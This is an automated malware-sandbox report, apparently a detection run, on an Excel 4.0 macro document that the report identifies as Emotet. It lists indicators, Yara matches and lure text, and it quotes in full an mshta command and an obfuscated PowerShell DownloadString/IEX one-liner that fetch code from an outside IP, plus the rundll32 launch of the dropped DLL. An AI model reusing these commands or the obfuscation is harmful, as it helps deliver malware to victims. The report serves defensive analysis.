Source: global traffic	HTTP traffic detected: GET /gg/ff/fe.html HTTP/1.1Accept: /Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 91.240.118.172Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /gg/ff/fe.png HTTP/1.1Host: 91.240.118.172Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/iM/ HTTP/1.1Host: jurnalpjf.lan.go.idConnection: Keep-Alive

Key, Mouse, Clipboard, Microphone and Screen Capturing

Creates a window with clipboard capturing capabilities

Source: C:\Windows\System32\mshta.exe

Window created: window name: CLIPBRDWNDCLASS

Jump to behavior

E-Banking Fraud

Yara detected Emotet

Source: Yara match

File source: C:\ProgramData\JooSee.dll, type: DROPPED

System Summary

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Source: Screenshot number: 4	Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. 16 17 18 19 20 30 31
Source: Screenshot number: 4	Screenshot OCR: DOCUMENT IS PROTECTED. 10 11 12 13 Previewing is not available for protected documents. 14 15
Source: Screenshot number: 4	Screenshot OCR: protected documents. 14 15 You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to pre
Source: Screenshot number: 4	Screenshot OCR: ENABLE CONTENT" buttons to preview this document. 16 17 18 19 20 30 31 32 33 34 35 36 3
Source: Document image extraction number: 0	Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 0	Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Document image extraction number: 0	Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 0	Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 1	Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 1	Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Document image extraction number: 1	Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 1	Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
Source: Screenshot number: 8	Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. 16 17 18 19 20 21 22 C
Source: Screenshot number: 8	Screenshot OCR: DOCUMENT IS PROTECTED. 10 11 12 13 Previewing is not available for protected documents. 14 15
Source: Screenshot number: 8	Screenshot OCR: protected documents. 14 15 You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to pre
Source: Screenshot number: 8	Screenshot OCR: ENABLE CONTENT" buttons to preview this document. 16 17 18 19 20 21 22 Ci [.I 23 24 25 26

Found malicious Excel 4.0 Macro

Source: imedpub_8.xls	Macro extractor: Sheet: REEEEEEEE contains: mshta
Source: imedpub_8.xls	Macro extractor: Sheet: REEEEEEEE contains: mshta

Document contains OLE streams with names of living off the land binaries

Source: imedpub_8.xls	Stream path 'Workbook' : ........ZO..........................\.p....xXx B.....a.........=...........................................=........p.08.......X.@...........".......................1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1..h...6........<..C.a.l.i.b.r.i. .L.i.g.h.t.1...,...6........<..C.a.l.i.b.r.i.1.......6........<..C.a.l.i.b.r.i.1.......6........<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1.......<........<..C.a.l.i.b.r.i.1.......>........<..C.a.l.i.b.r.i.1.......?........<..C.a.l.i.b.r.i.1.......4........<..C.a.l.i.b.r.i.1.......4........<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..A.r.i.a.l...3......#.,.#.#.0.\. .".. ".;.\.-.#.,.#.#.0.\. .".. "...=......#.,.#.#.0.\. .".. ".;.[.R.e.d.].\.-.#.,.#.#.0.\. .".. "...?......#.,.#.#.0...0.0.\. .".. ".;.\.-.#.,.#.#.0...0.0.\. .".. "...I..."..#.,.#.#.0...0.0.\. .".. ".;.[.R.e.d.].\.-.#.,.#.#.0...0.0.\. .".. "...q..6.._.-.. .#.,.#.#.0.\. .".. "._.-.;.\.-.. .#.,.#.#.0.\. .".. "._.-.;._.-.. .".-.".\. .".. "._.-.;._.-.@._.-...,.).'.._- #,##0_-;\-* #,##0_-;_-* "-"_-;_-@_-....,.>.._.-.. .#.,.#.#.0...0.0.\. .".. "._.-.;.\.-.. .#.,.#.#.0...0.0.\. .".. "._.-.;._.-.. .".-.".?.?.\. .".. "._.-.;._.-.@._.-...4.+./.._- #,##0.00_-;\-* #,##0.00_-;_-* "-"??_-;_-@_-..?...:.._("$"* #,##0.00_);_("$"* $#,##0.00$;_("$"* "-"??_);_(@_).......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ...ff....... ......+... ............ ......)... ............ ......,... ............ ......*... ............ .......... ............ .......... ............ .......... ............ .......... ....P....... .......... ....P....... .......
Source: imedpub_8.xls.0.dr	Stream path 'Workbook' : ........ZO..........................\.p....user B.....a.........=...........................................=........p.08.......X.@...........".......................1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1..h...6........<..C.a.l.i.b.r.i. .L.i.g.h.t.1...,...6........<..C.a.l.i.b.r.i.1.......6........<..C.a.l.i.b.r.i.1.......6........<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1.......<........<..C.a.l.i.b.r.i.1.......>........<..C.a.l.i.b.r.i.1.......?........<..C.a.l.i.b.r.i.1.......4........<..C.a.l.i.b.r.i.1.......4........<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..A.r.i.a.l...3......#.,.#.#.0.\. .".. ".;.\.-.#.,.#.#.0.\. .".. "...=......#.,.#.#.0.\. .".. ".;.[.R.e.d.].\.-.#.,.#.#.0.\. .".. "...?......#.,.#.#.0...0.0.\. .".. ".;.\.-.#.,.#.#.0...0.0.\. .".. "...I..."..#.,.#.#.0...0.0.\. .".. ".;.[.R.e.d.].\.-.#.,.#.#.0...0.0.\. .".. "...q..6.._.-.. .#.,.#.#.0.\. .".. "._.-.;.\.-.. .#.,.#.#.0.\. .".. "._.-.;._.-.. .".-.".\. .".. "._.-.;._.-.@._.-...,.).'.._- #,##0_-;\-* #,##0_-;_-* "-"_-;_-@_-....,.>.._.-.. .#.,.#.#.0...0.0.\. .".. "._.-.;.\.-.. .#.,.#.#.0...0.0.\. .".. "._.-.;._.-.. .".-.".?.?.\. .".. "._.-.;._.-.@._.-...4.+./.._- #,##0.00_-;\-* #,##0.00_-;_-* "-"??_-;_-@_-..?...:.._("$"* #,##0.00_);_("$"* $#,##0.00$;_("$"* "-"??_);_(@_).......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ...ff....... ......+... ............ ......)... ............ ......,... ............ ......*... ............ .......... ............ .......... ............ .......... ............ .......... ....P....... .......... ....P....... .......

Powershell drops PE file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\ProgramData\JooSee.dll

Jump to dropped file

Found Excel 4.0 Macro with suspicious formulas

Source: imedpub_8.xls	Initial sample: EXEC
Source: imedpub_8.xls	Initial sample: EXEC

Yara signature match

Source: imedpub_8.xls, type: SAMPLE	Matched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
Source: C:\Users\user\Desktop\imedpub_8.xls, type: DROPPED	Matched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f

Document misses a certain OLE stream usually present in this Microsoft Office document type

Source: 32B4.tmp.0.dr

OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false

Found a hidden Excel 4.0 Macro sheet

Source: imedpub_8.xls	Macro extractor: Sheet name: REEEEEEEE
Source: imedpub_8.xls	Macro extractor: Sheet name: REEEEEEEE

Searches for the Microsoft Outlook file path

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Jump to behavior

Document contains embedded VBA macros

Source: imedpub_8.xls	OLE indicator, VBA macros: true
Source: imedpub_8.xls.0.dr	OLE indicator, VBA macros: true

Source: imedpub_8.xls

ReversingLabs: Detection: 16%

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................P. .............................P. .....................`I.........v.....................K......(.e.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................Z..k....................................}..v....(.......0...............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................Z..k..... ..............................}..v............0...............(.e.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.......................k....................................}..v............0...............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.......................k......e.............................}..v............0.................e.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....#...............j..k....................................}..v............0...............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....#...............j..k......e.............................}..v....@.......0...............8.e.............................	Jump to behavior

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\cmd.exe CMD.EXE /c mshta http://91.240.118.172/gg/ff/fe.html
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\mshta.exe mshta http://91.240.118.172/gg/ff/fe.html
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI\|I`E`X
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\cmd.exe CMD.EXE /c mshta http://91.240.118.172/gg/ff/fe.html	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\mshta.exe mshta http://91.240.118.172/gg/ff/fe.html	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI\|I`E`X	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq	Jump to behavior

Source: C:\Windows\System32\mshta.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRD0E5.tmp

Jump to behavior

Source: classification engine

Classification label: mal100.troj.expl.evad.winXLS@9/8@2/3

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior

Source: imedpub_8.xls	OLE indicator, Workbook stream: true
Source: imedpub_8.xls.0.dr	OLE indicator, Workbook stream: true

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking

Source: C:\Windows\System32\mshta.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\mshta.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\mshta.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: wC:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.dll.pdb source: powershell.exe, 00000006.00000002.665123368.000000001C64E000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\dll\System.Management.Automation.pdb86)= source: powershell.exe, 00000006.00000002.661976040.0000000002B07000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbFile source: powershell.exe, 00000006.00000002.661976040.0000000002B07000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: m.Management.Automation.pdbpdbion.pdbProg source: powershell.exe, 00000006.00000002.661976040.0000000002B07000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ws\System.pdbpdbtem.pdbIL source: powershell.exe, 00000006.00000002.661976040.0000000002B07000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: >ystem.pdb source: powershell.exe, 00000006.00000002.661976040.0000000002B07000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.pdbgement.Automation.pdbBBK source: powershell.exe, 00000006.00000002.661976040.0000000002B07000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\System.pdbE source: powershell.exe, 00000006.00000002.661976040.0000000002B07000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: anagsymbols\dll\System.pdb source: powershell.exe, 00000006.00000002.665123368.000000001C64E000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: `C:\Windows\System.pdb source: powershell.exe, 00000006.00000002.665123368.000000001C64E000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdbion source: powershell.exe, 00000006.00000002.661976040.0000000002B07000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\symbols\dll\System.pdb_3 source: powershell.exe, 00000006.00000002.661976040.0000000002B07000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.pdb source: powershell.exe, 00000006.00000002.661976040.0000000002B07000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.pdb8 source: powershell.exe, 00000006.00000002.661976040.0000000002B07000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\dll\System.pdben source: powershell.exe, 00000006.00000002.661976040.0000000002B07000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.661976040.0000000002B07000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000006.00000002.665123368.000000001C64E000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.pdbSystem.pdbpdbtem.pdbm\2.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000006.00000002.665123368.000000001C64E000.00000004.00000010.00020000.00000000.sdmp

Source: 32B4.tmp.0.dr

Initial sample: OLE indicators vbamacros = False

Data Obfuscation

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\System32\mshta.exe

Code function: 4_3_035B30CB push 8B490286h; iretd

4_3_035B30D0

PE file contains an invalid checksum

Source: JooSee.dll.6.dr

Static PE information: real checksum: 0x8df98 should be: 0x935bd

Persistence and Installation Behavior

Drops PE files to the application program directory (C:\ProgramData)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\ProgramData\JooSee.dll

Jump to dropped file

Drops PE files

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\ProgramData\JooSee.dll

Jump to dropped file

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
